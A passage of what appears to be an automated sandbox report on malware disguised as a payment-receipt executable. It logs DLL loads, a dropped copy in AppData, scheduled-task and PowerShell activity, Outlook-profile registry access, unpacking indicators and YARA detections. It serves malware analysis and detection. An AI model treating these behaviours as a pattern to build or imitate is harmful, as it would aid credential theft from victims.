Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: jnXT.pdb source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe, euKeoTytdT.exe.1.dr
Source:	Binary string: jnXT.pdbSHA256HW source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe, euKeoTytdT.exe.1.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, UN2Il68uhcF7U4lhr2.cs	.Net Code: LnXmnAV4w8 System.Reflection.Assembly.Load(byte[])
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.2aaf698.0.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.6d70000.6.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.70a0000.7.raw.unpack, UN2Il68uhcF7U4lhr2.cs	.Net Code: LnXmnAV4w8 System.Reflection.Assembly.Load(byte[])
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b28198.3.raw.unpack, UN2Il68uhcF7U4lhr2.cs	.Net Code: LnXmnAV4w8 System.Reflection.Assembly.Load(byte[])
Source: 11.2.euKeoTytdT.exe.311f224.0.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Yara detected aPLib compressed binary

Source: Yara match	File source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.euKeoTytdT.exe.40b7e48.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.euKeoTytdT.exe.40b7e48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.euKeoTytdT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.euKeoTytdT.exe.40d1e68.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.euKeoTytdT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.euKeoTytdT.exe.40d1e68.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2228686790.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2289569837.00000000040D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2229898655.0000000003A47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2289569837.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2286478638.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2229898655.0000000003A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe PID: 5100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: euKeoTytdT.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: euKeoTytdT.exe PID: 7596, type: MEMORYSTR

Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Static PE information: 0xDE5A33C0 [Thu Mar 18 13:04:00 2088 UTC]

Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Code function: 1_2_06E7B6F8 pushad ; retf	1_2_06E7B6F9
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Code function: 1_2_06E76548 push es; retf	1_2_06E76560
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Code function: 1_2_06E71CEE push ds; retf	1_2_06E71CEF
Source: C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Code function: 1_2_0BDC1AC5 push FFFFFF8Bh; iretd	1_2_0BDC1AC7
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: 11_2_0733B6F8 pushad ; retf	11_2_0733B6F9
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: 11_2_07331CEE push ds; retf	11_2_07331CEF
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: 11_2_0BC30EC5 push FFFFFF8Bh; iretd	11_2_0BC30EC7
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: 17_2_00402AC0 push eax; ret	17_2_00402AD4
Source: C:\Users\user\AppData\Roaming\euKeoTytdT.exe	Code function: 17_2_00402AC0 push eax; ret	17_2_00402AFC

Source: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe	Static PE information: section name: .text entropy: 7.719014753369294
Source: euKeoTytdT.exe.1.dr	Static PE information: section name: .text entropy: 7.719014753369294

Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, xtZk0BqDFfSIoTf13a.cs	High entropy of concatenated method names: 'ftugKS4jac', 'qLSgfqcQ1Y', 'UHcgnCPXHa', 'IrDgDowSkP', 'ymIgt3raNm', 'A3AghGFkpm', 'zL3guoMS77', 'aZMg4s5P9N', 'lUcgAtB7ZZ', 'X1cgRyLIPZ'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, rd6seU0CBflQIvUF68.cs	High entropy of concatenated method names: 'a2BbxoIZPL', 'CXPbj0sIYW', 'cQLbldj7wP', 'ks1brT7Q4y', 'vBOb8EKQo3', 'IHqb5NmfME', 'YIyb9s5oU4', 'lkybE8eAyw', 'rFgb1Cj0p5', 's0fbNmlZvg'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, SstYqctIswIM3VfhHi.cs	High entropy of concatenated method names: 'Y2EVw3dD7J', 'lvvVWqNSYa', 'fQWVdXpSDT', 'qqYVgiv3GD', 'hhTVLfyUIu', 'X5ede91P3H', 'EY2dBDxGPR', 'CbddQrkiOC', 'y7AdsAQRMM', 'VcSdv5lnEB'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, a7YovMK8v3yfJuJ3TX.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'IblHvQiuOc', 'Xb1HU4lYjR', 'TXuHz4dM3n', 'XDJaTxPKR7', 'qS4aSGCWZc', 'AIBaHVniZR', 'Dfeaav7Oh0', 'jdLFjHlpyDugR14nE7u'
Source: 1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3b865b8.5.raw.unpack, bLP4McBA6wcmJVrIo0.cs	High entropy of concatenated method names: 'Bkp7bIGjM7', 'Y4Q70Y8wBD', 'uf177AKAWJ', 'HCX7pIcGiQ', 'Nhk7Z98GcK', 'XO973e3wTB', 'Dispose', 'Vd52PKSWQv', 'Jcf2WVBJif', 'dge2McsO33'
